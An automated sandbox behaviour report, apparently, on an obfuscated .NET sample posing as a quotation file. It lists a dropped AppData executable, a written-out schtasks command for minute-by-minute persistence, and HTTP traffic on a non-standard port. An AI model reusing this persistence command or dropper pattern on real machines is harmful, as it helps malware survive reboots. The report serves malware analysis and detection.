Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\QUOTATION062022.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QUOTATION062022.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION062022.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Binary or sample is protected by dotNetProtector

Source: QUOTATION062022.exe	String found in binary or memory: dotNetProtector
Source: QUOTATION062022.exe, 00000000.00000000.240683863.0000000000892000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: dotNetProtector
Source: QUOTATION062022.exe, 00000000.00000000.240683863.0000000000892000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
Source: QUOTATION062022.exe, 00000000.00000002.291392022.0000000000892000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: dotNetProtector
Source: QUOTATION062022.exe, 00000000.00000002.291392022.0000000000892000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
Source: Data.exe, 0000000B.00000000.291177733.0000000000E02000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: dotNetProtector
Source: Data.exe, 0000000B.00000000.291177733.0000000000E02000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
Source: Data.exe, 0000000B.00000002.360772652.0000000000E02000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: dotNetProtector
Source: Data.exe, 0000000B.00000002.360772652.0000000000E02000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
Source: QUOTATION062022.exe	String found in binary or memory: dotNetProtector
Source: QUOTATION062022.exe	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
Source: Data.exe.9.dr	String found in binary or memory: dotNetProtector
Source: Data.exe.9.dr	String found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_008923A0 pushfd ; iretd	0_2_0089281B
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_008922A7 push edx; retf	0_2_0089239F
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_00898332 pushad ; iretd	0_2_00898337
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_028028B3 push edx; retf	0_2_02802943
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_02802AF2 pushfd ; iretd	0_2_02802AF3
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7A7EA pushad ; iretd	0_2_04E7A8AC
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7A975 push cs; retn 0040h	0_2_04E7A976
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E74C73 pushad ; retf	0_2_04E74CC5
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E7A75D push eax; retn 0040h	0_2_04E7A75E
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E8AB85 push ebp; retf 0040h	0_2_04E8AB86
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04E9A4D2 push ecx; iretd	0_2_04E9A4E1
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Code function: 0_2_04EBB202 push E813485Eh; ret	0_2_04EBB209

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Data\Data.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 17910
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 17910 -> 49834

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
